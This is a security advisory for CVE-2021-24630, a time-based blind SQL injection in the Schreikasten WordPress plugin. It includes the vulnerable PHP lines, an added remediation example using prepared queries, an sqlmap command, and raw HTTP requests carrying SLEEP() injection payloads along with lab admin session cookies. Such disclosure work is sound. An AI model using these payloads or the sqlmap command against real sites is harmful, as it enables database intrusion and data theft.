Wp Plugin Schreikasten

Plugin Details

Plugin Name: wp-plugin : schreikasten
Affected Version : 0.14.18 (and most probably lower versions, if any)
Vulnerability : Injection
Minimum Level of Access Required : Author
CVE Number : CVE-2021-24630
Identified by : Shreya Pohekar
WPScan Reference URL

Disclosure Timeline

Technical Details

The reject, spam, delete and tracking functionality takes the GET parameters id and tid, is available to Author and higher roles, and does not properly sanitise, escape or validate these parameters before inserting them into the SQL statement, therefore leading to time-based blind SQL Injection.

Vulnerable Code: schreikasten.php#L2208

  1. Edit functionality
2206:			$id=$_GET['id'];
2207:			$table_name = $wpdb->prefix . "schreikasten";
2208:			$data = $wpdb->get_row("select alias, text, status, date, email from $table_name where id=$id");

Vulnerable Code: schreikasten.php#L2224

  1. In the tracking functionality
2222:			$tid=$_GET['tid'];
2223:			$table_name = $wpdb->prefix . "schreikasten";
2224:			$data = $wpdb->get_row("select * from $table_name where id=$tid");

Vulnerable Code: schreikasten.php#L2239

  1. set_spam, set_ham, set_black functionality
2237:			$id=$_GET['id'];
2238:			$table_name = $wpdb->prefix . "schreikasten";
2239:			$data = $wpdb->get_row("select alias, text, status, date, email from $table_name where id=$id");
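All three sites above share one pattern: a raw $_GET value concatenated straight into the query string. As an added example that is not part of this advisory or of the plugin, the following shows the defensive form those call sites would take in a WordPress plugin: validate the id as an integer and let $wpdb->prepare() build the query (the function name and parameter are hypothetical).

```php
<?php
// Added example, not the plugin's own code. Assumes it runs inside a
// WordPress plugin, where the global $wpdb, absint() and wp_unslash()
// are available.

/**
 * Fetch one schreikasten row by a numeric id taken from the request.
 * Returns null when the parameter is missing, not a positive integer,
 * or matches no row.
 *
 * @param string $param    GET parameter carrying the id ('id' or 'tid').
 * @param string $columns  Column list for the SELECT; the tracking site
 *                         used "*", the others a fixed column list.
 * @return object|null
 */
function sk_get_entry_by_request_param( $param, $columns = 'alias, text, status, date, email' ) {
    global $wpdb;

    // 1. Validate: absint() keeps only a non-negative whole number, so an
    //    input such as "6 AND (SELECT ...)" is reduced to 6 and the trailing
    //    text never becomes part of the SQL.
    if ( ! isset( $_GET[ $param ] ) ) {
        return null;
    }
    $id = absint( wp_unslash( $_GET[ $param ] ) );
    if ( 0 === $id ) {
        return null;
    }

    // 2. Parameterise: %d is an integer placeholder that $wpdb->prepare()
    //    fills and escapes. The table name is built from $wpdb->prefix, not
    //    from user input, so interpolating it is safe; $columns is a
    //    developer-supplied constant, never request data.
    $table_name = $wpdb->prefix . 'schreikasten';
    $sql = $wpdb->prepare(
        "SELECT {$columns} FROM {$table_name} WHERE id = %d",
        $id
    );

    return $wpdb->get_row( $sql );
}

// How the former call sites would use it (constructed illustration):
//   $data = sk_get_entry_by_request_param( 'id' );        // edit, set_spam, set_ham, set_black
//   $data = sk_get_entry_by_request_param( 'tid', '*' );  // tracking
```

A request carrying a SLEEP() payload in id or tid now either resolves to the plain integer prefix or returns null, so the query contains no attacker-controlled text.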

PoC Screenshot


Request

SQLmap command

sqlmap -r schreikasten.req.1 --dbms mysql --current-user --current-db -b -p tid --batch 
GET /wp-admin/edit-comments.php?page=skmanage&mode=edit&text&paged=1&mode_x=delete_x&id=6 AND (SELECT 9304 FROM (SELECT(SLEEP(5)))ghFg) HTTP/1.1
Host: 172.28.128.50
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/edit-comments.php?page=skmanage&mode&text&paged=1&mode_x=delete_x&id=5
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7C7d46e52fd4a194588368c613588ee7cad1e52536df2ef3b1feb852a651d0be7f; __eucookielaw=true; _ga=GA1.1.436418670.1617784311; wp-settings-time-4=1619288085; ignored_html_tags=1; manage_settings=1; wordpress_test_cookie=WP%20Cookie%20check; sk-id=-732593242; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist; wp-settings-time-1=1619788600; comment_author_232395f24f6cff47569f2739c21385d6=admin; comment_author_email_232395f24f6cff47569f2739c21385d6=admin%40localhost.com; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7Cbdffb007e4474c2bef17258655b9ead9c8b9bfc828fd770ad8adb901596a5dbb
Connection: close
  1. Tracking
GET /wp-admin/edit-comments.php?page=skmanage&mode=tracking&text&paged=1&mode_x=delete_x&id=7&tid=6 AND (SELECT 9304 FROM (SELECT(SLEEP(5)))ghFg) HTTP/1.1
Host: 172.28.128.50
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/edit-comments.php?page=skmanage&mode&text&paged=1&mode_x=delete_x&id=7
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7C7d46e52fd4a194588368c613588ee7cad1e52536df2ef3b1feb852a651d0be7f; __eucookielaw=true; _ga=GA1.1.436418670.1617784311; wp-settings-time-4=1619288085; ignored_html_tags=1; manage_settings=1; wordpress_test_cookie=WP%20Cookie%20check; sk-id=-732593242; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist; wp-settings-time-1=1619788600; comment_author_232395f24f6cff47569f2739c21385d6=admin; comment_author_email_232395f24f6cff47569f2739c21385d6=admin%40localhost.com; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7Cbdffb007e4474c2bef17258655b9ead9c8b9bfc828fd770ad8adb901596a5dbb
Connection: close
  1. set_spam, set_ham, set_black
GET /wp-admin/edit-comments.php?page=skmanage&mode&text&paged=1&mode_x=set_black_x&id=2 AND (SELECT 6141 FROM (SELECT(SLEEP(5)))ewlo) HTTP/1.1
Host: 172.28.128.50
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/edit-comments.php?page=skmanage&mode&text
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7C7d46e52fd4a194588368c613588ee7cad1e52536df2ef3b1feb852a651d0be7f; __eucookielaw=true; _ga=GA1.1.436418670.1617784311; wp-settings-time-4=1619288085; ignored_html_tags=1; manage_settings=1; wordpress_test_cookie=WP%20Cookie%20check; sk-id=-732593242; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist; wp-settings-time-1=1619788600; comment_author_232395f24f6cff47569f2739c21385d6=admin; comment_author_email_232395f24f6cff47569f2739c21385d6=admin%40localhost.com; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7Cbdffb007e4474c2bef17258655b9ead9c8b9bfc828fd770ad8adb901596a5dbb
Connection: close